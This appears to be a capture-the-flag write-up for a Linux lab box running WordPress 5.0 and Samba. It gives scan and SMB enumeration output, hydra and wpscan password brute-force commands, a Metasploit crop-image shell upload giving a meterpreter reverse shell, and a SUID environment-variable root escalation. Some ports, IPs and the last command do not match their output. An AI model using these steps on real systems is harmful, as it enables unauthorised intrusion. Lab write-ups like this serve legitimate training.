- OS: Linux
- Difficulty: Medium
- Author: Talace
Scanning
Threader3000.py
1
2
3
4
| Port 22 is open
Port 139 is open
Port 80 is open
Port 445 is open
|
Nmap scan
1
2
3
4
5
6
7
8
9
10
11
| nmap -p21,80 -sV -sC -T4 -Pn -oA 10.10.10.5 10.10.10.5
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
|_http-title: Billy Joel's IT Blog – The IT blog
|_/wp-admin/
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
Enumeration
SMB Enumeration with enum4linux & smbclient
1
2
3
4
5
6
7
| enum4linux 10.10.15.175 -A
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
BillySMB Disk Billy's local SMB Share
IPC$ IPC IPC Service (blog server (Samba, Ubuntu))
|
Now that we’ve found some shared folder, let’s dig in it.
1
2
3
4
5
| smbclient --no-pass //10.10.15.175/BillySMB
Alice-White-Rabbit.jpg N 33378 Tue May 26 14:17:01 2020
tswift.mp4 N 1236733 Tue May 26 14:13:45 2020
check-this.png N 3082 Tue May 26 14:13:43 2020
|
Found nothing interesting, let’s go on the wordpress
Exploit
Brute force login page w/ hydra & wpscan
wpscan brute force attack login
1
| wpscan --url http://blog.thm/ --passwords /usr/share/wordlists/rockyou.txt
|
(another way with hydra) Hydra brute force attack login
1
| hydra -l kwheel -P /usr/share/wordlists/rockyou.txt blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username"
|
now let’s search for an exploit in metasploit
1
2
3
4
5
| search WordPress 5.0.0
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload
|
Perfect! Let’s try it!
1
2
3
4
5
6
| set LHOST 10.8.138.226
set RHOSTS 10.10.15.175
set USERNAME kwheel
set PASSWORD *********
run
|
Nice we get our meterpreter session!
Privilege escalation
Suid file
Found the file
1
2
3
| find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null\
-rwsr-sr-x 1 root root 8432 May 26 2020 /usr/sbin/checker
|
Ltrace it to see what’s done in there
1
2
3
4
5
| ltrace /usr/sbin/checker
getenv("admin") = "1"
setuid(0) = 0
system("/bin/bash")
|
Since we only need admin to be true and present in the env, let’s export the value
And run it again!
Got root! Now let’s find user.txt and root.txt, since we now the creator of this box is a player
1
2
3
4
| find / -type f -name "user.txt"
/home/bjoel/user.txt
/media/usb/user.txt
|
And root.txt!
1
2
3
4
| find / -type f -name "user.txt"
/root/root.txt
|